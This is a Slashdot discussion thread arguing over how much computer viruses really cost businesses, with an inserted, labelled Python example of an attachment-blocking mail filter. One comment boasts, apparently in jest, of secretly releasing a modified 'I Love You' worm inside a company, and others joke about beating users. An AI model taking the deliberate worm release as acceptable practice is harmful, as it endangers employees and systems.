How Much Do Computer Virus Attacks Really Cost?
An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.
Data point: $10/computer/year (Score:1)
zero cost if you run IBM OS/2 (Score:1)
Re:What does reputation cost? (Score:1)
Re:Stupidity (Score:1)
*yawn* (Score:1)
It is company policy not to open electronic mail messages containing attachments, or to receive or transmit electronic messages of a non-work-related nature. It is agreed by all parties that violating this policy will result in immediate dismissal.
Re:How do you calculate lost WASTED time? (Score:1)
If a vb script virus is transmitted by someone opening an 'I love you' or 'AnnaKournekova.jpg' how much productivity are you REALLY losing? They just don't have as much time to waste. I suppose it could have a terrible impact on morale...
Lord knows my morale plummeted this morning when I discovered that the hot nude pic of Anna Kournikova that somebody had emailed me was, in fact, just some lame Windows virus..
Virus cost? What about Windows cost? (Score:1)
We spent much more time dealing with Windows-related problems (with 80 users, wipe and reinstall Win9x on 2-3 machines per month) than we did with viruses. So I'd like to see a study on the labor costs of using Windows - it might dwarf the cost of virus infections.
How much did US Businesses gain? (Score:1)
that depends on (Score:1)
the first thing that goes when the next big virus hits my company is my sanity.
this is because multiple messages are sent to all saying
"the message with as a subject line is a virus, don't open it. get your virus update here"
and then you see 10 messages right after it with the aforementioned subject.
I don't know why these people have an email account anyway, they can't f*cking read.
I hate monday.
Here you have,
damnit.
Re:How much do virus *myths* cost businesses? (Score:1)
"We have the right to believe at our own risk any hypothesis that is live enough to tempt our will."
Re:The real cost of viruses... $$ AND time (Score:1)
Correct me if I'm wrong, but isn't the "real work" of a sysadmin exactly that - maintenance?
--
doesn't cost a dime (Score:1)
zero cost (Score:1)
Re:How much do virus *myths* cost businesses? (Score:1)
Re:The real cost of viruses... (Score:1)
Just a thought here. But doesn't it seem odd that every 6 months to a year there is a really big email style virus that hits a large majority of the "not so bright" people out there?
Now most of these viruses don't do a lot of damage like the good old viruses that ate the hd as fast as possible. But from what I've seen there is one cost I haven't seen mentioned yet...the virus checker. Ok they aren't terribly expensive, but most people who get these viruses and lack an IT Dept go buy the latest virus checker to fix the problem. Seems like the companies that make virus checkers are quite happy whenever there is a big virus that gets into all the "dense" people's computers.
Which brings me to the thought of "what if the virus checker companies made and distributed the virus?". Good for sales, keeps them in business, and keeps the fear alive. But since I don't know anyone working for any of these companies I couldn't give any proof. But it still seems suspicious.
Plural of "virus" (Score:2)
See http://language.perl.com/misc/virus.html [perl.com].
causes... (Score:2)
I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.
But those things are not legitimately attributable to viruses. Those are attributable to hiring idiots for admins.
The rest of your post I agree with.
Re:How much do virus *myths* cost businesses? (Score:2)
Fah, I have a whole pile of systems that were deemed to be not Y2K compliant. Of all of them one required that the clock be reset, but only under Windows, it runs Linux just fine.
The rest of the world spent far less on their computer systems, and yet their lights stayed on. Y2K was a myth, for all intents and purposes. But it got rid of a lot of cruft, and it made a bunch of hardware and software companies very wealthy, so it wasn't all bad.
Re:Neither Macs nor *nix machines are immune (Score:2)
The chances of such a worm propagating are essentially nil. The trick worked in this one particular case because you happened to know exactly the software that your friend would be using. If your Applescript were sent to a Mac user that used some other email client it would have simply crashed. There simply aren't enough Mac Eudora users to sustain such a beast.
You tricked one guy (who you happened to know), but how many of the messages in his inbox were from Eudora using Mac addicts? And of those few who actually use the right type of software how many of them would open up any random jpeg from your buddy without poking at it a little first?
Microsoft is certainly responsible for creating software with such disregard for security. But it isn't the fact that all of the other email clients in the world are so much more secure that keeps their users from becoming targets, it is the fact that Windows + Outlook has the largest install base. There are scads of gullible Windows users, and there is a good chance that most of the addresses in a typical Windows User's address book are running the same sort of software.
Re:The real cost of viruses... (Score:2)
There is still lost time. For example, the system administrators probably had something else they needed to be doing. In most of the organizations I have worked for the sysadmins don't just sit around all day playing quake and waiting for a fire. The lost time simply applies to all of the things that the sysadmin could have accomplished if he hadn't been cleaning up viruses. If your systems administrators are only busy when you have a virus, eliminating viruses would allow you to cut back on the amount of systems administrators that you hire.
Also, there is the fact that when a virus epidemic hits there are generally more than one system affected. Email servers are shut off, multiple workstations re-formatted and re-seeded. The largest expense of nearly any business is its payroll (in the US anyway). If a part of a company's workforce is unable to work at peak capacity it is squandering its most costly resource. Viruses often affect entire departments, and can cost real money to a business.
Re:OnTheFly Source (Score:2)
Re:Microsoft (Score:2)
Sorry, x86's since the 80286 have included multi-ring security. Too bad no one ever implemented anything with it...
sPh
Re:"Loss" == "IRS allows you to write it off". (Score:2)
Therefore things like software piracy, virus attacks, are not losses."
That's funny. My coworker and I, who are 100% scheduled from now through April 30th on an ERP implementation for a small manufacturing company, have spent the last three hours (and appear to have about 3 more to go, or a total of 12 manhours) working on the e-mail server because some idiot decided sending out Kourinokava.vbs files was funny (and yes, I know the users shouldn't have clicked on that). Now, that's 12 manhours down the drain. Plus, when I arrive at the manufacturing site tomorrow, I won't be prepared for the work I was going to do, and another 8 hours or so of everyone's time will be wasted as we try to work through that unpreparedness.
Now, exactly how is that NOT a cost?
sPh
How ironic. (Score:2)
The cost of virii is directly proportional to the stubbornness of both users and IT managers who refuse to get rid of programs like Outbreak which have repeatedly demonstrated this sort of problem, with no real remedy on the horizon. Infect me once, shame on you. Infect me twice, shame on me. Infect me three times, and I deserve to die because I'm not taking precautions!
--
Re:$0 since fall of 1998. (Score:2)
Outlook and Exchange come with the territory - it'd be tougher for us to substitute a different mail system than the payback would justify.
Personally, I'd prefer a nice IMAP-based system that is less vulnerable to begin with, but if you manage the system carefully you can make the MS stuff work acceptably well - which is nice when you work at a company that's drank the Microsoft-branded Kool-Aid.
- -Josh Turiel
$0 since fall of 1998. (Score:2)
After that, we put up an SMTP scanner/gateway between our Exchange server and the rest of the world. I set up filters to automatically block anything executable at all via e-mail, including stuff like
The downside is that I'm the "no fun" admin (since we block all the fun programs from e-mail), but on the other hand I've counted 26 copies of the "Kournikova" worm today alone that have bounced off our server harmlessly. I think it was worth it for sure. Since I'm stuck with Windows for the foreseeable future, I'm happy with what I can do to prevent these from affecting us.
So our ongoing cost to really deal with viruses is $0. But I do have software costs (annual licenses), plus some time spent devising our strategy and implementing it. But that's part of the job - I can't really call it "virus costs".
- -Josh Turiel
Re:Hope none of y'all are framing carpenters (Score:2)
Commercially available lengths usually start at 8 feet (96 inches) going up in length in multiples of 2 feet (24 inches).
A "stud" is usually 93 inches in length, which means that nailing them at right angles to a 1.5 inch thick bottom, or sole, plate and a 1.5 inch thick top plate results in an 8 foot wall. (In construction the question of when to say "foot" and when to say "feet" is answered "it depends")
If you remodel a house built in the early 1950's you'll find that the "2x4's" used back then are slightly wider and thicker (by either an eighth or a sixteenth of an inch, don't feel like going out in the rain to the shop to the woodbin with a tape measure just now) and the studs are shorter by double the thickness increase so that the wall is still 96 inches high.
Extrapolating back there was probably a time when 2x4's were 2 inches by 4 inches wide and thick (or thick and wide).
In the context of the original post, a 2x4 is a board that you can wrap your hands around and use to beat someone with or threaten to do so.
Re:Virus cost: (Score:2)
Re:Starting a virus is like arson. (Score:2)
Re:Starting a virus is like arson. (Score:2)
Re:"Loss" == "IRS allows you to write it off". (Score:2)
--
Re:Next to nothing, if you're doing your job. (Score:2)
"Real" viruses may have better luck getting in, but we're generally up to date with the updates.
As for Ghost, we'd use it (in fact, I've been pushing for it), but to get it done legit is expensive. Not a problem to me, but I don't always get the gear/utilities that I want because of price. Oh well.
Raptor
Next to nothing, if you're doing your job. (Score:2)
Under Windows, you do the following:
a) Install Norton on every machine
b) Pay for LiveUpdate
c) Set tight-fisted policy, so that anyone who breaks it realizes that it's their fault, and they *may* get bumped to the bottom of the queue
d) Use a mail server capable of decent filtering (procmail is excellent for this, and your unix box can relay to Exchange if you *really* need it)
e) Network profiles and user directories, with a solid backup rotation.
Of course, everyone here knew that, right?
I've dealt with this before. We've fixed it in a matter of minutes due to good policy, an extra box lying around, and a tight-fisted reign over the network.
Raptor
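The gateway filtering described in the "$0 since fall of 1998" comment and in step (d) above, sketched as an added example that is not part of either post and is not either poster's configuration. The extension and MIME-type lists, the function names and the sample messages are assumptions constructed for illustration; the thread itself names only .vbs.

```python
import os
from email import message_from_bytes, policy
from email.message import EmailMessage

# Assumption: illustrative block list. The thread names only .vbs; a real
# gateway would carry a longer, site-specific list.
BLOCKED_EXTENSIONS = {".vbs", ".vbe", ".js", ".exe", ".scr", ".pif", ".bat", ".com"}
# Assumption: MIME types treated as executable even when the name looks harmless.
BLOCKED_TYPES = {"application/x-msdownload", "application/x-msdos-program"}


def normalise(filename):
    """Lower-case the name and drop trailing dots/spaces, which Windows ignores."""
    return (filename or "").strip().rstrip(". ").lower()


def blocked_reason(filename, content_type):
    """Return why an attachment is refused, or None if it may pass."""
    name = normalise(filename)
    stem, ext = name.rsplit(".", 1) if "." in name else (name, "")
    ext = "." + ext if ext else ""
    if ext in BLOCKED_EXTENSIONS:
        # "picture.jpg.vbs" shows as "picture.jpg" when the client hides
        # known extensions, so report the disguise explicitly.
        if "." in stem:
            return "double extension .%s%s" % (stem.rsplit(".", 1)[1], ext)
        return "blocked extension %s" % ext
    if content_type in BLOCKED_TYPES:
        return "blocked type %s" % content_type
    return None


def inspect_message(raw):
    """Parse a raw RFC 5322 message and list (filename, reason) for refused parts."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    # walk() also descends into message/rfc822 parts, so a worm that arrives
    # inside a forwarded message is inspected like a direct attachment.
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename()
        reason = blocked_reason(filename, part.get_content_type())
        if reason:
            findings.append((filename, reason))
    return findings


def gateway_verdict(raw):
    """Return ("reject", findings) or ("accept", [])."""
    findings = inspect_message(raw)
    return ("reject", findings) if findings else ("accept", [])


def _mail(subject, attachments):
    """Build a constructed sample message; attachment bytes are inert placeholders."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "staff@example.com"
    msg["Subject"] = subject
    msg.set_content("Constructed sample body.")
    for name, subtype in attachments:
        msg.add_attachment(b"constructed placeholder bytes",
                           maintype="application", subtype=subtype, filename=name)
    return msg


def sample_messages():
    """Constructed inputs covering the cases the filter has to get right."""
    forwarded = EmailMessage()
    forwarded["From"] = "colleague@example.com"
    forwarded["To"] = "staff@example.com"
    forwarded["Subject"] = "Fwd: Here you have"
    forwarded.set_content("Forwarding this, constructed sample.")
    forwarded.add_attachment(
        _mail("Here you have", [("AnnaKournikova.jpg.vbs", "octet-stream")]))
    samples = {
        "worm": _mail("Here you have", [("AnnaKournikova.jpg.vbs", "octet-stream")]),
        "clean": _mail("Q1 numbers", [("report.pdf", "pdf")]),
        "trailing_dot": _mail("Invoice", [("Invoice.EXE.", "octet-stream")]),
        "typed": _mail("Photo", [("holiday.jpg", "x-msdownload")]),
        "forwarded": forwarded,
    }
    return {key: msg.as_bytes() for key, msg in samples.items()}


if __name__ == "__main__":
    for key, raw in sample_messages().items():
        print(key, gateway_verdict(raw))
```

A filter like this decides on names and declared types only, so it complements the desktop scanner in steps (a) and (b) rather than replacing it.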
Not much $$$ for us.. (Score:2)
Very Little....Probably (Score:2)
From a pure production stand-point, we lost some $$ since we shut down the mail-server until we fixed it, but still, who knows? We lost a day's worth of work for 12 people doing various production-related things, most of a day of my projects which have a direct impact on the entire company rather than a single dept., and we had no email for 6-8 hours which threw a kink into everyone's communications. Hard to measure.
I did get some payback that day. Since we run an email-to-fax gateway, the 3-4 people who had a Contacts list full of fax addresses got to deal with a shit load of calls from irritated correspondents who were getting 10+ page faxes full of I Love You's code.
--
The question is... (Score:2)
But what happens when people start writing more insidious viruses?
Say: flip a random bit in a random data file. Those bits add up over a few years, and even if you had two years' accumulated daily backup tapes, it would be nigh impossible to rebuild clean data from them. So what happens when you go to work one day, start troubleshooting a problem, and suddenly discover that you can't trust any of the data on any of your company's computers? And can't even confidently demonstrate which files are corrupt and which aren't?
Or: suppose someone uses a virus to cover a more sinister attack? The bank's IT staff congratulate themselves at how quickly they squashed a viral attack, not realizing that one of those messages had the same subject line and same
Other scenarios should be easy to come up with as well. The surprise is that the virus writers haven't come up with them yet. (Or haven't they?)
My point is: yes, headlines probably use grossly inflated figures for the cost of virus attacks, and yes, most of them could be shrugged off as annoying pranks. But will it always be that way? Rather than playing down the seriousness of viruses by pointing out cases of obvious or probable exaggeration, we should be trying to scare the bejesus out of our clients and employers, before "the big one" comes along.
--
Re:OnTheFly Source (Score:2)
I saw something recently about how the anti-virus companies are starting to whinge about how the number of different compression schemes available out there makes it really hard to create signatures for all the viruses. Same virus, different compression ==> different signature required.
--
Other stats. (Score:2)
While we're at it, can we get some independent academic research into other unquestioned numbers such as losses due to piracy?
These estimates get quoted in a couple articles, then stated in court and suddenly they're real and no one wants to question them.
Re:How much do virus *myths* cost businesses? (Score:2)
A 2x4 is also at times known as a "clue stick."
Re:Personal estimate.. (Score:2)
And you can set up scheduled virus-scans in your Windows clients, make this part of the standard load image. My notebook Win2K client does it now.
However, the general vulnerability of MS Windows software to viruses is a _great_ motivator for a company to look into using Linux on the desktops.
Give me an ever-better Wine to run MS Office apps, plus a Linux version of Lotus Notes, and SecureID SSL encryption ported to Linux, I won't use Win2K!
The best way to pay for the effects of viruses .. (Score:2)
This country (and, in many ways, the entire Western world) has been transformed into a place where there is no such thing as personal responsibility anymore. If you spill a cup of hot coffee on yourself, it's not your fault
I hereby call "bullshit" on this. People need to be taught a basic modicum of computer security common sense. Sure, the virus authors need to be held accountable, but if a virus or e-mail worm paralyzes a corporate intranet for a day and the point of injection can be determined, why not hold that user responsible as well, particularly if a virus alert has already been issued? I'll tell you what: a moron who blindly clicks on and opens every single attachment they get will think twice about it if they have to put a couple of months' worth of mortgage payments on their credit cards because half of their paycheck went to paying the tech support guys to clean up the mess they created.
Viruses can be thwarted so that their effect is minimal, but this is not going to happen so long as user stupidity is coddled and encouraged and users who do stupid things are allowed to claim that it's "not their fault." It's not their fault that the virus was created, of course, but it is their fault that they did a very stupid thing that cost a lot of people a lot of money. If you start making people pay for their mistakes, you'll find that they wind up making a hell of a lot less mistakes.
Viruses *helped* our business prosper (Score:2)
By surreptitiously releasing a modified copy of "I Love You", we were able to determine with a high degree of accuracy which of our resources were, in fact, complete and total dipshits. After sending out a company wide email with the subject "WARNING: I Love You! DO NOT OPEN! VIRUS INSIDE!", many, many employees (mostly from legal and marketing) were immediately identified as being dipshits. We cut the fat, as it were, and are now a leaner, smarter organization better able to meet the challenges of the 21st century, sans dipshits.
Virus costs (Score:2)
Software licensing costs for anti-virus software are huge for a medium-to-large business. Also, the time spent in "what do we, as a company do about virii" is non-trivial.
In the ideal company, anti-xxxx tactics (where xxxx is any sort of intrusion, theft, vandalism, etc) would be left to the people who do the job, but this is rarely the case.
Re:Stupidity (Score:2)
Now about 'dem hossless carriges... 8^)
--
Productivity and Cost (Score:2)
Time is a finite resource that is closely linked to productivity. Productivity is linked to the completion of projects. When one's time is taken up by unscheduled workload (ie: the virus incident), current projects tend to suffer. That means the project either slips or more time has to be thrown at it. Where do you get that time? You hire more people to work the project, increasing the available manhours (time) and increasing the cost.
Whether these virus scares SHOULD cause such an impact on an organization's available time is an entirely different matter.
Same here... (Score:2)
If that isn't lost money, I don't know what is!
We use Windows (unfortunately) for a lot of our stuff, and most everybody uses Outlook - I use Netscape, and I consequently DON'T HAVE A PROBLEM (Netscape doesn't know what to do with the attachments). Also, I uninstalled Windows Scripting, so that nips it as well.
I have tried repeatedly to get the IS dept or anyone who would listen to switch to something else, filter VBS scripts at the server - something: All to no avail, so far...
Worldcom [worldcom.com] - Generation Duh!
Re:Stupidity (Score:2)
The frightening thing to me - how the hell does McAfee get the data that makes up the map?
If I were running antivirus software, the last thing I'd want is to have it phoning home to tell some third party that I was infected.
Sounds like a privacy/security nightmare.
Starting a virus is like arson. (Score:2)
What's boneheaded about it? Can you think of a way requiring LESS down time to make SURE that the virus and anything it corrupted is removed from ANY computer at the company?
Starting a virus is like starting a fire - in this case one that burns through all the computers that are susceptible. After the fire is out the firemen are going to water the ashes and dig them up to make SURE it's out, and build firebreaks to keep it from relighting from the surrounding area (which may still be burning).
Re:Opportunity cost (Score:2)
No, I'm not. I explicitly took that into account with the "bank account" analogy for the time-difference in value of the money.
The cost in current dollars is the amount you have to put into the interest bearing account, in order to have the money to cover the shortfalls at the time they occur. Future withdrawals are a greater number of dollars than the initial deposit.
what it cost us (Score:2)
Sysadmin salary/120,000 minutes worked per year*10 minutes= $4.16
That's our total loss. If you decide to count the amount of time spent learning about viruses, that means you count the amount of time we spend with Bugtraq every morning, which we would do anyway, so that's a wash.
Yeah, $4.16. That's about right.
I agree, it's nothing (Score:2)
If that's so, then lost productivity because of a 'down system' also is 'intangible', and therefore has no effect on 'cost'.
Hey, it's THEIR rules...
Re:VBS.SST@MM (Score:2)
Re:Caution: Anecdotal evidence (Score:2)
Y'know, it'd be cheaper to just make everyone click it and not have to worry about reinfection than to spend money on a virus scanner. Or hell, less money on bandwidth spent by clicking it than downloading a new definition file.
I don't understand (Score:2)
---
And Then... (Score:2)
What, you mean like... (Score:2)
Seriously though, you can quietly manage the whole thing. You don't have to have the whole company up in arms over it.
Fuzzy math (Score:2)
Re:OnTheFly Source (Score:2)
Anyone de-obfuscated it?
Typically I'd have to say the numbers are wrong. (Score:2)
The real cost for a single instance of a virus is dealt with mostly costs in overtime for personnel while things are restored, inspected, and placed back into service.
The real cost overall is having to buy the software to protect against virii, and hiring the people that do nothing but guard the network. These costs don't contribute to the bottom, they merely protect it. This is the real cost of a good virus, it just usually isn't paid until someone catches something (when it should have been paid all along).
criminal economics (Score:2)
Like all other forms of crime, computer viruses actually make money for countless people.
From the products and salaries of virus companies, to cops' salaries, to the salaries of reporters and other media, crime is great for absolutely everyone but a tiny irrelevant minority.
I was on site at a company in NY... (Score:2)
Seth
Re:I partially agree.... (Score:2)
But this doesn't follow. If there were no viruses at all, you wouldn't need to worry about them as a source of data problems, and you wouldn't need to spend the $24 per client for anti-virus software. What that means is that the threat of a virus alone is enough to force you to add costs, so there's a cost associated with viruses even for well run shops that don't actually get infected. It's not a direct cost, but it still exists.
Re:The best way to pay for the effects of viruses (Score:2)
Odd that you should mention this. I did determine which one of my users opened it first. And while I didn't go to the extreme that you said of taking money from his pocket... I did send out a company-wide email jokingly pointing the finger at him (I called him a dead man).
A little public humiliation can go a long way. I will guarantee you that he'll think twice about opening attachments from now on.
Re: (Score:2)
Simple Math... (Score:2)
According to the New McAfee Virus Map:
Luvbug.vbs infected
So, 10,000x$0.25 = $2500.00/day
Therefore - Today, Luvbug.vbs cost Americans $2,500.00 today...
Re:Simple Math... (Score:2)
above should read less than 10,000 infected systems
Re:Caution: Anecdotal evidence (Score:2)
I read one Slashdot article about viruses (this one), and am responding to it. Cost: two minutes.
'Nuff said.
Re:I think...Marketing of fear=sales (Score:2)
ILOVEYOU (Score:2)
How much they cost here (Score:2)
When a 'worm' or other VBS mayhem is rampant:
$110 per billable hour (average)
x 10 minutes per hour to wade through excess mail
$11 dollars per end user per hour
x 15 end users
$165 per hour
+ 30 bucks an hour for my services
= 195 per hour.
That's when there is an active .VBS worm running loose. These problems have seldom lasted longer than 2 hours - and that is due to the mail admins living on the West Coast and not being available as soon as the East Coast facilities are hit.
Otherwise, I'd guesstimate that I spend at the most 2 work hours per week on virus and work related issues - that's average. Some weeks more, some weeks less, some weeks none at all.
Above figures are for a small part of a larger manufacturing concern.
Re:How to Calculate Actual Cost (Score:2)
Re:I think...Marketing of fear=sales (Score:2)
Unfortunately, the number of people in the world who fit the description above is approximately 12. Most end-users are so pig-headedly stupid that they wouldn't know a virus if it were wearing a neon sign around its neck. We actually had one user at my company that opened 7 different messages that had the subject "I love you" on the day of the Love Bug outbreak. And this was that afternoon, when a high priority alert had been sent out by our AV response team that morning!
People are stupid. In the work environment, we have to try to protect them from themselves. Once they leave the office though, they're on their own.
Re:"Loss" == "IRS allows you to write it off". (Score:2)
A virus has a cost associated with it. Cost of productivity. Can we write it off. Hmmm software bought to prevent it happening again, extra consultants brought into the firm to upgrade systems
That's the way I see it.
How the tax systems work I don't know but I would not be surprised if someone could claim it if there was enough proof and well documented claim.
example:
Traveling salesman that has full account of his time in a written (hand) log. He/She could put computer down time as a loss of sales and presentation for the amount of days the system was down, proratedly only for the days the computer would be used based on a historical documentation of the hand written log file.
There was a great article in Forbes magazine about how to manage your records for the IRS. This included those people that were gamblers and other types of people that have to keep a written log.
ONEPOINT
Lost productivity (Score:2)
The original love letter virus cost millions in lost productivity, because it crashed thousands of (Exchange) mail servers. Also, I lose productivity every time I reboot, because I have to wait for Norton Virus scan to download new patterns and scan my hard drive. Also, on an older system, the virus scanner interacted with Netware to crash Windows every time it tried to boot up, which cost me several hours of lost work until the IT department finally relented and told me the password to disable the virus scan function!
Interesting to note, however, that all these costs were incurred only on systems running MICROS~1 software... the more interesting question is "How does the cost of virii to Windows users compare to the cost of virii on non-windows users?"
Should buffer-overflow (stack smashing) and root exploits be included in the costs analysis? If not, it seems like the costs to Linux users is zero...
Hidden cost (Score:2)
Why virus cost companies so much (Score:2)
About VBScript . . . (Score:3)
A flu virus?
The colophon claims this is a drawing of a Sea Urchin. I'm not convinced.
Geoff
Re:The real cost of viruses... (Score:3)
Let's imagine there are no virii. So I don't need to buy the tools and expertise (not a one off cost as you have to employ extra people to cover you for the virus attacks). So that's the cost before you even talk about time.
Now in terms of time. The issue is quality time, the people who get hit aren't the bright ones, but the bright ones have to clean it up. So yes I've lost 2 hours of an average person's time, but worst of all I've just lost 1 x n hours of bright people. These people are NOT HAVING A BREAK they are WORKING ON A NON-BILLABLE TASK. Thus the cost is that every hour they work they could be billable.
Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".
I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.
Is that supposed to be funny? (Score:3)
No, it assumes they're doing it instead of regular work, where regular work is defined as not dealing with the virus. It's a matter of opportunity cost.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
That's a joke, right? There are no duplicate entries when the person is doing Activity A instead of Activity B.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
That a given activity is included in a person's job description is irrelevant unless that is the only activity in their job description. The only person who could possibly fall into this strange category you describe would be a "Virus Recovery Specialist" who is hired to do nothing but recover from viruses. But alas, that would put a definite, fixed monetary figure on virus treatment regardless of actual virus instances. Wouldn't the anti-virus software publishers love that!
Also, you're grossly simplifying the value of restoring from backup and the resulting lack of damage. How "regular" can your backups be before the backup processes interfere with getting the job done? And assuming you're not continuously backing up every keystroke (or other data input or manipulation) as it occurs, there will be data loss between the most recent backup and the time of restoration. Backups are important, but they're not a perfect, complete solution.
There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in its duration. It's a minuscule blip, made slightly larger by being all at once.
I wish that made sense even from a twisted perspective, but it doesn't. I keep hoping this is a joke, but I see it moderated as "Informative" which is a pretty scary thing to consider. Yes, delays in work exist due to phone calls, etc., but to imply that adding more delays has no impact is like saying 1 plus 1 equals 1.
And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
At last, something I can agree with -- the total cost of the Sys Admin's salary shouldn't be attributed to virus recovery. I'm glad you put "total" in your statement, because otherwise we'd be right back to the apparently-facetious claim that adding labor does not add cost.
Generally speaking, I think virus cost estimates are unreliable eye candy for bored newspeople and anti-virus software vendors. Bigger numbers equal bigger revenue for them, whether through audience attention or software sales. They're eye candy to virus authors too, for that sense of "accomplishment." Actual costs are probably impossible to ascertain and are thus a worthless goal of analysis. It's like putting a specific dollar figure on the earthquake in India -- hey, does the exact damage really matter, or should we just do what we can to help the survivors recover?
Personal estimate.. (Score:3)
But we do tend to get a nasty one about once a year. Win/CIH, ILUVYOU, etc. License costs of all the various scanners runs five figures. Planning, annoying the users to update their definition files, installing the software adds on cost as well.
Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe) I only get $5 billion.
Either the rest of the companies out there are doing a bad job preparing for viruses and a bad job dealing with them, or the $12.1 figure was just pulled out of someone's ass.
Caution: Anecdotal evidence (Score:3)
So, I guess you could call that a loss of 10 or 15 minutes of "productivity" for everyone in the company. Oh no, 10 man-hours lost! And at our billing rate...!
But frankly, not everyone was working anyway. There's at least as much time lost every day to reading online news and talking to friends, not to mention waiting for conference calls, etc etc. The impact was totally negligible, unless this virus had some nasty side effect of deleting all the files on someone's hard drive.
The cost isn't because of viri it's from ... (Score:3)
Maybe these companies should be able to sue Microsoft, for lost time and money.
ANSWER: Where these numbers come from! (Score:3)
Small company of 100 people, open 250 days/year.
Annual GROSS income $5 million.
$5m/250days/8hours = $2500/hr.
Virus comes in, hits 24 people.
Sysadmin can fix a machine in 15 minutes, making for six hours of work. That's $15000 in lost revenue!!! Then add on the salary for the sysadmin and the staff when they're not working, and you've got 12hr at $50/hr (average salary, including the CEO, who makes $2million in stock options), or another $600. Wow, almost $16k for a small company!!! (interesting aside: $16000/24 people comes to $666/person)
Now, let's look at this rationally. The sysadmin (a) can probably do several machines simultaneously, and (b) is already getting paid for this sort of thing. It's his job! Then there's the staff, who for their 15 minutes of downtime might take their allotted coffee break, or maybe even do some (gasp!) paperwork!
For non-destructive viruses, I would guess the average cost to be about $5/seat infected. A far cry from the $666/seat calculated above. Here are some of the flaws that lead to this discrepancy:
1) All work time is computer time for all staff infected.
2) Time spent repairing the damage is outside of normal duties for the admin.
3) All staff work at 100% efficiency all of the time.
4) Time spent repairing the damage can't be done when the staff aren't around.
In other words, the numbers quoted are nothing more than so much bullshit.
Re:OnTheFly Source (Score:3)
McAfee seems to detect it (I'm not sure if by heuristics or if it has the signature), but Norton AntiVirus doesn't detect it...
What's interesting is how it decodes itself from the string. I kind of remember a couple of VBS viruses doing that earlier.
It could be much worse. Many of these script viruses could be enhanced so the vbs extension doesn't show, and to use variable encoding keys, which would make it harder to create signatures.
Re:How much do virus *myths* cost businesses? (Score:3)
Any time you have an incident like this, go see the user personally with a pair of handcuffs and a 2x4. Gradually, as users become more enlightened about IS policy, you will see a decrease in these types of messages.
Re:The real cost of viruses... (Score:3)
Hey, street crime wouldn't cost anything if people all stayed inside.
Stupidity (Score:3)
Basically a map of stupidity...
Is Your State Stupid? [mcafee.com]
viruses cost me my sanity (Score:3)
Mostly I've been losing my freaking sanity from listening to my uber-geeky previous boss trying to "keep on top" of each virus. He does his own insightful analysis of the thing ("a-ha! this attachment is really a VB script!") He scours the web, digging up all the information that's readily available to anyone who wants to look for it, then spams the entire team for days on end with a torrent of "informative" e-mails that put the original virus to shame.
I bet you all have this same guy working in your office. Admit it, it's probably you.
omega_rob -- friend of the bonsai kitten
How could it *not* cost a lot of money? (Score:3)
It's not all that complicated of a concept, why do you need it broken down for you? Some Linux users are so naive about the real world.
"Loss" == "IRS allows you to write it off". (Score:4)
Therefore things like software piracy, virus attacks, are not losses.
Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accountants don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and they claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when Windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.
If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.
The real cost of viruses... (Score:4)
The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.
This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in its duration. It's a minuscule blip, made slightly larger by being all at once.
Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
Something to keep in mind... (Score:4)
Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected" [vmyths.com], which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saying that only 10,000 machines had been hit.
</rant>
What does reputation cost? (Score:4)
-B
Re:Stupidity (Score:4)
Opportunity cost (Score:4)
- A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
- The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.
and so on.
Let's suppose it's a high-tech company on the rise. And let's suppose this delays its product introduction by one day.
Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.
